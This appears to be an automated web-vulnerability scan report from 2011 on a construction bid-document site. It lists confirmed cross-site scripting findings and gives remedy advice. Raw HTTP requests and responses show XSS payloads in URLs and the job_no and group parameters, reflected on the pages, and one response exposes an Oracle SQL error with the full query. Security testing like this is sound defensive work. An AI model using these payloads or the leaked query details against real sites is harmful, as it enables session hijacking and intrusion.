oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="%27"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Cross-site Scripting
Cross-site Scripting
18
TOTAL
IMPORTANT
CONFIRMED
17
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session
- Changing the look of the page within the victims browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
Remedy References
External References
|
- /qap/action/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000AD)%3C/script%3E
/qap/action/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000AD)%3C/script%3E CONFIRMED |
Parameters
| Parameter | Type | Value |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x0000AD)</script> |
Request
GET /qap/action/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000AD)%3C/script%3E HTTP/1.1
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=324403&group=11&provider=453856&sortType=0&jobNo=1464405
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=324403&group=11&provider=453856&sortType=0&jobNo=1464405
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:02:16 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:17 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 315
Content-Type: text/html;charset=utf-8
<html><body onload="location.replace('/qap/action/'"--></style></script><script>netsparker(0x0000AD)</script>?xreferrer='+escape(document.referrer))"><h1>Not Found</h1><br>The requested URL /qap/action/'"--></style></script><script>netsparker(0x0000AD)</script> was not found on this server.<br></body></html>
Date: Tue, 01 Mar 2011 20:02:16 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:17 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 315
Content-Type: text/html;charset=utf-8
<html><body onload="location.replace('/qap/action/'"--></style></script><script>netsparker(0x0000AD)</script>?xreferrer='+escape(document.referrer))"><h1>Not Found</h1><br>The requested URL /qap/action/'"--></style></script><script>netsparker(0x0000AD)</script> was not found on this server.<br></body></html>
|
- /qap/action/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000109)%3C/script%3E
/qap/action/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000109)%3C/script%3E CONFIRMED |
Parameters
| Parameter | Type | Value |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x000109)</script> |
Request
GET /qap/action/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000109)%3C/script%3E HTTP/1.1
Referer: http://qap.questcdn.com/qap/action/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/action/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:02:23 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:23 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 335
Content-Type: text/html;charset=utf-8
<html><body onload="location.replace('/qap/action/index.html'"--></style></script><script>netsparker(0x000109)</script>?xreferrer='+escape(document.referrer))"><h1>Not Found</h1><br>The requested URL /qap/action/index.html'"--></style></script><script>netsparker(0x000109)</script> was not found on this server.<br></body></html>
Date: Tue, 01 Mar 2011 20:02:23 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:23 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 335
Content-Type: text/html;charset=utf-8
<html><body onload="location.replace('/qap/action/index.html'"--></style></script><script>netsparker(0x000109)</script>?xreferrer='+escape(document.referrer))"><h1>Not Found</h1><br>The requested URL /qap/action/index.html'"--></style></script><script>netsparker(0x000109)</script> was not found on this server.<br></body></html>
|
- /qap/projects/prj_browse/prj_download_bid_tab.html
/qap/projects/prj_browse/prj_download_bid_tab.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| job_no | GET | '"--></style></script><script>alert(0x000125)</script> |
Request
GET /qap/projects/prj_browse/prj_download_bid_tab.html?job_no='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000125)%3C/script%3E HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:02:28 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:28 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 1865
Content-Type: text/html;charset=utf-8
<!--$Header: c:/questcdn/cvs/quest-src/www/projects/prj_browse/prj_b_dlconf.html,v 1.1.1.1 2005/01/28 18:06:36 rstruthers Exp $--><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><title>Confirm Plan Download</title> <csscriptdict import> <script language="JavaScript1.2" src="/qap/j_scripts/CSScriptLib.js"></script> </csscriptdict> <csactiondict> <script><!--CSAct[/*CMP*/ 'B3CF82470'] = new Array(CSCallFunction,'download','self');// --></script> </csactiondict> <csactions> <csaction name="B3CF82470" class="Call Function" type="ONEVENT" val0="download" val1="self"> </csactions><script language="javascript1.1">function closeWindow(){ window.close();}function download(){ document.planDownload.submit();}</script></head><BODY BGCOLOR="white"><p><table name="foo" width="440" ><font face="Verdana" size="2" color="#0000000"> Press the DOWNLOAD DOC button to download the bid tabulation</b> plan.<P> When the download is complete, press the DONE button to close this window.<P> </td></tr> <form name="planDownload" action="/qap/download" method="post"> <input type="hidden" id="job_no" name="job_no" value="'"--></style></script><script>netsparker(0x000125)</script>"> <input type="hidden" id="download_type" name="download_type" value="bidtab"> <input type="hidden" id="member_no" name="member_no" value="0"> <tr> <td><p><div align=right><a href="javascript: document.planDownload.submit();"><img src="/qap/images/buttons/bu_down_doc.gif" border="0"></a> <a href="javascript: window.close();"><img src="/qap/images/buttons/bu_done.gif" border="0"></a></div></td> </tr> </form> </font> <tr> <td height="60"><font size="1" face="Verdana">© 1999-2010 Quest Construction Data Network, LLC</font></td> </tr> </table></body></html>
Date: Tue, 01 Mar 2011 20:02:28 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:28 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 1865
Content-Type: text/html;charset=utf-8
<!--$Header: c:/questcdn/cvs/quest-src/www/projects/prj_browse/prj_b_dlconf.html,v 1.1.1.1 2005/01/28 18:06:36 rstruthers Exp $--><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><title>Confirm Plan Download</title> <csscriptdict import> <script language="JavaScript1.2" src="/qap/j_scripts/CSScriptLib.js"></script> </csscriptdict> <csactiondict> <script><!--CSAct[/*CMP*/ 'B3CF82470'] = new Array(CSCallFunction,'download','self');// --></script> </csactiondict> <csactions> <csaction name="B3CF82470" class="Call Function" type="ONEVENT" val0="download" val1="self"> </csactions><script language="javascript1.1">function closeWindow(){ window.close();}function download(){ document.planDownload.submit();}</script></head><BODY BGCOLOR="white"><p><table name="foo" width="440" ><font face="Verdana" size="2" color="#0000000"> Press the DOWNLOAD DOC button to download the bid tabulation</b> plan.<P> When the download is complete, press the DONE button to close this window.<P> </td></tr> <form name="planDownload" action="/qap/download" method="post"> <input type="hidden" id="job_no" name="job_no" value="'"--></style></script><script>netsparker(0x000125)</script>"> <input type="hidden" id="download_type" name="download_type" value="bidtab"> <input type="hidden" id="member_no" name="member_no" value="0"> <tr> <td><p><div align=right><a href="javascript: document.planDownload.submit();"><img src="/qap/images/buttons/bu_down_doc.gif" border="0"></a> <a href="javascript: window.close();"><img src="/qap/images/buttons/bu_done.gif" border="0"></a></div></td> </tr> </form> </font> <tr> <td height="60"><font size="1" face="Verdana">© 1999-2010 Quest Construction Data Network, LLC</font></td> </tr> </table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_browse.html
/qap/projects/prj_browse/ipp_prj_browse.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| group | GET | '"--></style></script><script>alert(0x000140)</script> |
| provider | GET | 765295 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse.html?group='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000140)%3C/script%3E&provider=765295 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:02:35 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:35 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10259
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000140%29%3C%2Fscript%3E&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000140%29%3C%2Fscript%3E&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000140%29%3C%2Fscript%3E&provider=765295" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:38.501 [ 1] (TP-Processor1601) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01756: quoted string not properly terminated while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = '"--></style></script><script>netsparker(0x000140)</script> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="'"--></style></script><script>netsparker(0x000140)</script>"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:02:35 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:35 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10259
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000140%29%3C%2Fscript%3E&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000140%29%3C%2Fscript%3E&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000140%29%3C%2Fscript%3E&provider=765295" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:38.501 [ 1] (TP-Processor1601) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" 